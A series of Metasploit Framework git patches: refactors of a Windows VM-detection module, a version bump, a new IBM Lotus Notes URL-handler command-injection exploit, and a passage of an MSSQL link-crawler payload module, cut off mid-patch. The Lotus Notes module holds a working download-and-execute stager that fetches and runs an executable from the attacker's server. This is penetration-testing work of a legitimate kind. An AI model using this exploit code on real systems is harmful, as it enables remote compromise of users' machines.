Msf::Post end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "MS Hyper-V" }, + :update => :unique_data + ) print_status("This is a Hyper-V Virtual Machine") return "MS Hyper-V" end @@ -102,8 +102,7 @@ class Metasploit3 < Msf::Post def vmwarechk(session) vm = false begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') if srvvals.include?("vmdebug") vm = true elsif srvvals.include?("vmmouse") @@ -113,28 +112,24 @@ class Metasploit3 < Msf::Post elsif srvvals.include?("VMMEMCTL") vm = true end - key.close rescue end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\BIOS', KEY_READ) - if key.query_value('SystemManufacturer').data.downcase =~ /vmware/ + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System\BIOS','SystemManufacturer').data.downcase =~ /vmware/ vm = true end - key.close rescue end end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0', KEY_READ) - if key.query_value('Identifier').data.downcase =~ /vmware/ + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier').data.downcase =~ /vmware/ vm = true end rescue end - key.close end if not vm vmwareprocs = [ @@ -151,6 +146,12 @@ class Metasploit3 < Msf::Post end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VMware" }, + :update => :unique_data + ) print_status("This is a VMware Virtual Machine") return "VMWare" end @@ -172,9 +173,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') if srvvals.include?("vpc-s3") vm = true elsif srvvals.include?("vpcuhub") @@ -182,11 +181,16 @@ class Metasploit3 < Msf::Post elsif srvvals.include?("msvmmouf") vm = true end - key.close rescue end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VirtualPC" }, + :update => :unique_data + ) print_status("This is a VirtualPC Virtual Machine") return "VirtualPC" end @@ -208,8 +212,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') if srvvals.include?("VBOX__") vm = true end @@ -218,8 +221,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') if srvvals.include?("VBOX__") vm = true end @@ -228,8 +230,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') if srvvals.include?("VBOX__") vm = true end @@ -238,8 +239,8 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /vbox/ + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier').data.downcase =~ /vbox/ vm = true end rescue @@ -247,8 +248,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System') - if key.query_value('SystemBiosVersion').data.downcase =~ /vbox/ + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion').data.downcase =~ /vbox/ vm = true end rescue @@ -256,8 +256,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') if srvvals.include?("VBoxMouse") vm = true elsif srvvals.include?("VBoxGuest") @@ -267,11 +266,16 @@ class Metasploit3 < Msf::Post elsif srvvals.include?("VBoxSF") vm = true end - key.close rescue end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VirtualBox" }, + :update => :unique_data + ) print_status("This is a Sun VirtualBox Virtual Machine") return "VirtualBox" end @@ -292,8 +296,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\DSDT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') if srvvals.include?("Xen") vm = true end @@ -302,8 +305,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\FADT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HARDWARE\ACPI\FADT') if srvvals.include?("Xen") vm = true end @@ -312,8 +314,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\ACPI\RSDT', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') if srvvals.include?("Xen") vm = true end @@ -322,8 +323,7 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') if srvvals.include?("xenevtchn") vm = true elsif srvvals.include?("xennet") @@ -335,11 +335,16 @@ class Metasploit3 < Msf::Post elsif srvvals.include?("xenvdb") vm = true end - key.close rescue end end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "Xen" }, + :update => :unique_data + ) print_status("This is a Xen Virtual Machine") return "Xen" end @@ -349,8 +354,8 @@ class Metasploit3 < Msf::Post vm = false if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /qemu/ + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier').data.downcase =~ /qemu/ print_status("This is a QEMU/KVM Virtual Machine") vm = true end @@ -359,8 +364,8 @@ class Metasploit3 < Msf::Post end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DESCRIPTION\System\CentralProcessor\0') - if key.query_value('ProcessorNameString').data.downcase =~ /qemu/ + key_path = 'HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0' + if registry_getvaldata(key_path,'ProcessorNameString').data.downcase =~ /qemu/ print_status("This is a QEMU/KVM Virtual Machine") vm = true end @@ -369,6 +374,12 @@ class Metasploit3 < Msf::Post end if vm + report_note( + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "Qemu/KVM" }, + :update => :unique_data + ) return "Qemu/KVM" end end From 1ca85e2fff53e2ee86ff63cedcdd9db67096f036 Mon Sep 17 00:00:00 2001 From: Carlos Perez Date: Sat, 22 Dec 2012 10:42:43 -0400 Subject: [PATCH 050/154] fix indentation and EOL spaces --- modules/post/windows/gather/checkvm.rb | 60 +++++++++++++------------- 1 file changed, 30 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 8f7faadf96..7082eb7a96 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -88,11 +88,11 @@ class Metasploit3 < Msf::Post end if vm report_note( - :host => session, - :type => 'host.hypervisor', - :data => { :hypervisor => "MS Hyper-V" }, - :update => :unique_data - ) + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "MS Hyper-V" }, + :update => :unique_data + ) print_status("This is a Hyper-V Virtual Machine") return "MS Hyper-V" end @@ -147,11 +147,11 @@ class Metasploit3 < Msf::Post if vm report_note( - :host => session, - :type => 'host.hypervisor', - :data => { :hypervisor => "VMware" }, - :update => :unique_data - ) + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VMware" }, + :update => :unique_data + ) print_status("This is a VMware Virtual Machine") return "VMWare" end @@ -186,11 +186,11 @@ class Metasploit3 < Msf::Post end if vm report_note( - :host => session, - :type => 'host.hypervisor', - :data => { :hypervisor => "VirtualPC" }, - :update => :unique_data - ) + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VirtualPC" }, + :update => :unique_data + ) print_status("This is a VirtualPC Virtual Machine") return "VirtualPC" end @@ -271,11 +271,11 @@ class Metasploit3 < Msf::Post end if vm report_note( - :host => session, - :type => 'host.hypervisor', - :data => { :hypervisor => "VirtualBox" }, - :update => :unique_data - ) + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "VirtualBox" }, + :update => :unique_data + ) print_status("This is a Sun VirtualBox Virtual Machine") return "VirtualBox" end @@ -340,11 +340,11 @@ class Metasploit3 < Msf::Post end if vm report_note( - :host => session, - :type => 'host.hypervisor', - :data => { :hypervisor => "Xen" }, - :update => :unique_data - ) + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "Xen" }, + :update => :unique_data + ) print_status("This is a Xen Virtual Machine") return "Xen" end @@ -375,11 +375,11 @@ class Metasploit3 < Msf::Post if vm report_note( - :host => session, - :type => 'host.hypervisor', - :data => { :hypervisor => "Qemu/KVM" }, - :update => :unique_data - ) + :host => session, + :type => 'host.hypervisor', + :data => { :hypervisor => "Qemu/KVM" }, + :update => :unique_data + ) return "Qemu/KVM" end end From ae4f43469128703071a1de6b787a0d66069c7c5c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sat, 22 Dec 2012 13:10:44 -0600 Subject: [PATCH 051/154] Handle RequestError Some registry-retrieving functions will return nil when a RequestError exception is raised, and that's the exception we should be handling. --- modules/post/windows/gather/checkvm.rb | 279 ++++++++++--------------- 1 file changed, 108 insertions(+), 171 deletions(-) diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb index 7082eb7a96..92e876b31e 100644 --- a/modules/post/windows/gather/checkvm.rb +++ b/modules/post/windows/gather/checkvm.rb @@ -19,71 +19,56 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Virtual Environment Detection', - 'Description' => %q{ - This module attempts to determine whether the system is running - inside of a virtual environment and if so, which one. This - module supports detectoin of Hyper-V, VMWare, Virtual PC, - VirtualBox, Xen, and QEMU. - }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Carlos Perez '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ] - )) + 'Name' => 'Windows Gather Virtual Environment Detection', + 'Description' => %q{ + This module attempts to determine whether the system is running + inside of a virtual environment and if so, which one. This + module supports detectoin of Hyper-V, VMWare, Virtual PC, + VirtualBox, Xen, and QEMU. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Carlos Perez '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) end # Method for detecting if it is a Hyper-V VM def hypervchk(session) - begin - vm = false - sfmsvals = registry_enumkeys('HKLM\SOFTWARE\Microsoft') - if sfmsvals.include?("Hyper-V") - vm = true - elsif sfmsvals.include?("VirtualMachine") + vm = false + sfmsvals = registry_enumkeys('HKLM\SOFTWARE\Microsoft') + if sfmsvals and sfmsvals.include?("Hyper-V") + vm = true + elsif sfmsvals and sfmsvals.include?("VirtualMachine") + vm = true + end + if not vm + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion') =~ /vrtual/i vm = true end - rescue end if not vm - begin - if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion').data.downcase =~ /vrtual/ - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') + if srvvals and srvvals.include?("VRTUAL") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') - if srvvals.include?("VRTUAL") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') + if srvvals and srvvals.include?("VRTUAL") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') - if srvvals.include?("VRTUAL") - vm = true - end - rescue - end - end - if not vm - begin - srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') - if srvvals.include?("vmicheartbeat") - vm = true - elsif srvvals.include?("vmicvss") - vm = true - elsif srvvals.include?("vmicshutdown") - vm = true - elsif srvvals.include?("vmicexchange") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("vmicheartbeat") + vm = true + elsif srvvals and srvvals.include?("vmicvss") + vm = true + elsif srvvals and srvvals.include?("vmicshutdown") + vm = true + elsif srvvals and srvvals.include?("vmicexchange") + vm = true end end if vm @@ -101,34 +86,25 @@ class Metasploit3 < Msf::Post # Method for checking if it is a VMware VM def vmwarechk(session) vm = false - begin - srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') - if srvvals.include?("vmdebug") - vm = true - elsif srvvals.include?("vmmouse") - vm = true - elsif srvvals.include?("VMTools") - vm = true - elsif srvvals.include?("VMMEMCTL") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("vmdebug") + vm = true + elsif srvvals and srvvals.include?("vmmouse") + vm = true + elsif srvvals and srvvals.include?("VMTools") + vm = true + elsif srvvals and srvvals.include?("VMMEMCTL") + vm = true end if not vm - begin - if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System\BIOS','SystemManufacturer').data.downcase =~ /vmware/ - vm = true - end - rescue + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System\BIOS','SystemManufacturer') =~ /vmware/i + vm = true end end if not vm - begin - key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' - if registry_getvaldata(key_path,'Identifier').data.downcase =~ /vmware/ - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier') =~ /vmware/i + vm = true end end if not vm @@ -172,16 +148,13 @@ class Metasploit3 < Msf::Post end end if not vm - begin - srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') - if srvvals.include?("vpc-s3") - vm = true - elsif srvvals.include?("vpcuhub") - vm = true - elsif srvvals.include?("msvmmouf") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("vpc-s3") + vm = true + elsif srvvals and srvvals.include?("vpcuhub") + vm = true + elsif srvvals and srvvals.include?("msvmmouf") + vm = true end end if vm @@ -211,62 +184,44 @@ class Metasploit3 < Msf::Post end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') - if srvvals.include?("VBOX__") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') + if srvvals and srvvals.include?("VBOX__") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') - if srvvals.include?("VBOX__") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\FADT') + if srvvals and srvvals.include?("VBOX__") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') - if srvvals.include?("VBOX__") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') + if srvvals and srvvals.include?("VBOX__") + vm = true end end if not vm - begin - key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' - if registry_getvaldata(key_path,'Identifier').data.downcase =~ /vbox/ - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier') =~ /vbox/i + vm = true end end if not vm - begin - if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion').data.downcase =~ /vbox/ - vm = true - end - rescue + if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion') =~ /vbox/i + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') - if srvvals.include?("VBoxMouse") - vm = true - elsif srvvals.include?("VBoxGuest") - vm = true - elsif srvvals.include?("VBoxService") - vm = true - elsif srvvals.include?("VBoxSF") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("VBoxMouse") + vm = true + elsif srvvals and srvvals.include?("VBoxGuest") + vm = true + elsif srvvals and srvvals.include?("VBoxService") + vm = true + elsif srvvals and srvvals.include?("VBoxSF") + vm = true end end if vm @@ -295,47 +250,35 @@ class Metasploit3 < Msf::Post end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') - if srvvals.include?("Xen") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\DSDT') + if srvvals and srvvals.include?("Xen") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HARDWARE\ACPI\FADT') - if srvvals.include?("Xen") - vm = true - end - rescue + srvvals = registry_enumkeys('HARDWARE\ACPI\FADT') + if srvvals and srvvals.include?("Xen") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') - if srvvals.include?("Xen") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\HARDWARE\ACPI\RSDT') + if srvvals and srvvals.include?("Xen") + vm = true end end if not vm - begin - srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') - if srvvals.include?("xenevtchn") - vm = true - elsif srvvals.include?("xennet") - vm = true - elsif srvvals.include?("xennet6") - vm = true - elsif srvvals.include?("xensvc") - vm = true - elsif srvvals.include?("xenvdb") - vm = true - end - rescue + srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services') + if srvvals and srvvals.include?("xenevtchn") + vm = true + elsif srvvals and srvvals.include?("xennet") + vm = true + elsif srvvals and srvvals.include?("xennet6") + vm = true + elsif srvvals and srvvals.include?("xensvc") + vm = true + elsif srvvals and srvvals.include?("xenvdb") + vm = true end end if vm @@ -353,23 +296,17 @@ class Metasploit3 < Msf::Post def qemuchk(session) vm = false if not vm - begin - key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' - if registry_getvaldata(key_path,'Identifier').data.downcase =~ /qemu/ - print_status("This is a QEMU/KVM Virtual Machine") - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0' + if registry_getvaldata(key_path,'Identifier') =~ /qemu/i + print_status("This is a QEMU/KVM Virtual Machine") + vm = true end end if not vm - begin - key_path = 'HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0' - if registry_getvaldata(key_path,'ProcessorNameString').data.downcase =~ /qemu/ - print_status("This is a QEMU/KVM Virtual Machine") - vm = true - end - rescue + key_path = 'HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0' + if registry_getvaldata(key_path,'ProcessorNameString') =~ /qemu/i + print_status("This is a QEMU/KVM Virtual Machine") + vm = true end end From 179e4cf8701a0b6b6f466d57ef9e8f842afccbe9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 24 Dec 2012 08:40:29 -0600 Subject: [PATCH 052/154] Moving up to 4.6.0-dev --- lib/msf/core/framework.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index 40607e11f9..99050a6cb5 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -17,9 +17,9 @@ class Framework # Major = 4 - Minor = 5 + Minor = 6 Point = 0 - Release = "-release" + Release = "-dev" if(Point) Version = "#{Major}.#{Minor}.#{Point}#{Release}" From 4c897c51818c57be2a5a90790737848e31112a53 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 24 Dec 2012 16:23:19 +0100 Subject: [PATCH 053/154] added module for ZDI-12-154 --- .../browser/notes_handler_cmdinject.rb | 189 ++++++++++++++++++ 1 file changed, 189 insertions(+) create mode 100644 modules/exploits/windows/browser/notes_handler_cmdinject.rb diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb new file mode 100644 index 0000000000..98cc97075c --- /dev/null +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -0,0 +1,189 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Lotus Notes Client URL Handler Command Injection", + 'Description' => %q{ + This modules exploits a command injection vulnerability in the URL handler for + for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with + an specially crafted notes:// URL to execute arbitrary commands with also arbitrary + arguments. This module has been tested successfully on Windows XP SP3 with IE8, + Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Moritz Jodeit', # Vulnerability discovery + 'Sean de Regge', # Vulnerability analysis + 'juan vazquez' # Metasploit + ], + 'References' => + [ + [ 'CVE', '2012-2174' ], + [ 'OSVDB', '83063' ], + [ 'BID', '54070' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ], + [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ], + [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ] + ], + 'Payload' => + { + 'Space' => 2048, + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'EXITFUNC' => "none", + 'InitialAutoRunScript' => 'migrate -k -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jun 18 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + end + + def exploit + @exe_name = rand_text_alpha(2) + ".exe" + @stage_name = rand_text_alpha(2) + ".js" + super + end + + def on_new_session(session) + if session.type == "meterpreter" + session.core.use("stdapi") unless session.ext.aliases.include?("stdapi") + end + + @dropped_files.delete_if do |file| + win_file = file.gsub("/", "\\\\") + if session.type == "meterpreter" + begin + wintemp = session.fs.file.expand_path("%TEMP%") + win_file = "#{wintemp}\\#{win_file}" + # Meterpreter should do this automatically as part of + # fs.file.rm(). Until that has been implemented, remove the + # read-only flag with a command. + session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) + session.fs.file.rm(win_file) + print_good("Deleted #{file}") + true + rescue ::Rex::Post::Meterpreter::RequestError + print_error("Failed to delete #{win_file}") + false + end + + end + end + + end + + def on_request_uri(cli, request) + + if request.uri =~ /\.exe$/ + return if ((p=regenerate_payload(cli))==nil) + register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}") + register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}") + data = generate_payload_exe({:code=>p.encoded}) + print_status("Sending payload") + send_response(cli, data, {'Content-Type'=>'application/octet-stream'}) + return + end + + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] + if datastore['SSL'] + schema = "https" + else + schema = "http" + end + uri = "#{schema}://#{my_host}" + uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe" + + script = "var w=new ActiveXObject('wscript.shell');" + script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');" + script << "var x=new ActiveXObject('Microsoft.XMLHTTP');" + script << "x.open('GET','#{uri}', false);" + script << "x.send();" + script << "var s=new ActiveXObject('ADODB.Stream');" + script << "s.Mode=3;" + script << "s.Type=1;" + script << "s.Open();" + script << "s.Write(x.responseBody);" + script << "s.SaveToFile('#{@exe_name}',2);" + script << "w.Run('#{@exe_name}');" + + vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM" + + link_id = rand_text_alpha(5 + rand(5)) + + js_click_link = %Q| + function clickLink(link) { + var cancelled = false; + + if (document.createEvent) { + var event = document.createEvent("MouseEvents"); + event.initMouseEvent("click", true, true, window, + 0, 0, 0, 0, 0, + false, false, false, false, + 0, null); + cancelled = !link.dispatchEvent(event); + } + else if (link.fireEvent) { + cancelled = !link.fireEvent("onclick"); + } + + if (!cancelled) { + window.location = link.href; + } + } + | + + if datastore['OBFUSCATE'] + js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link) + js_click_link.obfuscate + js_click_link_fn = js_click_link.sym('clickLink') + else + js_click_link_fn = 'clickLink' + end + + + html = <<-EOS + + + + + + + + + EOS + + print_status("Sending html") + send_response(cli, html, {'Content-Type'=>'text/html'}) + + end + +end \ No newline at end of file From 677b9718da395d2ae3f852f9560b9df673dfee6d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Dec 2012 11:13:51 -0600 Subject: [PATCH 054/154] Finalizing module --- .../windows/mssql/mssql_linkcrawler.rb | 70 ++++++++++++------- 1 file changed, 45 insertions(+), 25 deletions(-) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index d33c237ce9..9be19e9d60 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -1,3 +1,11 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/exploit/mssql_commands' @@ -10,32 +18,39 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft SQL Server - Database Link Crawler', - 'Description' => %q{This module can be used to crawl MS SQL Server - database links and deploy metasploit payloads through links configured - with sysadmin privileges using a valid SQL Server Login. If you are - attempting to obtain multiple reverse shells using this module we - recommend setting the "DisablePayloadHandler" advanced option to "true", - and setting up a multi/handler to run in the background as a job to - support multiple incoming shells. If you are interested in deploying - payloads to spefic servers this module also supports that functionality - via the "DEPLOYLIST" option. Currently, the module is capable of - delivering payloads to both 32bit and 64bit Windows systems via - powershell memory injection methods based on Matthew Graeber's work. - As a result, the target server must have powershell installed. - By default, all of the crawl information is saved to a CSV formatted - log file and MSF loot so that the tool can also be used for auditing - without deploying payloads.}, + 'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution', + 'Description' => %q{ + This module can be used to crawl MS SQL Server database links and deploy + Metasploit payloads through links configured with sysadmin privileges using a + valid SQL Server Login. + + If you are attempting to obtain multiple reverse shells using this module we + recommend setting the "DisablePayloadHandler" advanced option to "true", and setting + up a multi/handler to run in the background as a job to support multiple incoming + shells. + + If you are interested in deploying payloads to spefic servers this module also + supports that functionality via the "DEPLOYLIST" option. + + Currently, the module is capable of delivering payloads to both 32bit and 64bit + Windows systems via powershell memory injection methods based on Matthew Graeber's + work. As a result, the target server must have powershell installed. By default, + all of the crawl information is saved to a CSV formatted log file and MSF loot so + that the tool can also be used for auditing without deploying payloads. + }, 'Author' => [ - 'Antti Rantasaari ', - 'Scott Sutherland "nullbind" ' + 'Antti Rantasaari ', + 'Scott Sutherland "nullbind" ' ], 'Platform' => [ 'win' ], 'License' => MSF_LICENSE, - 'References' => [[ 'URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'], - ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], - ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']], + 'References' => + [ + ['URL', 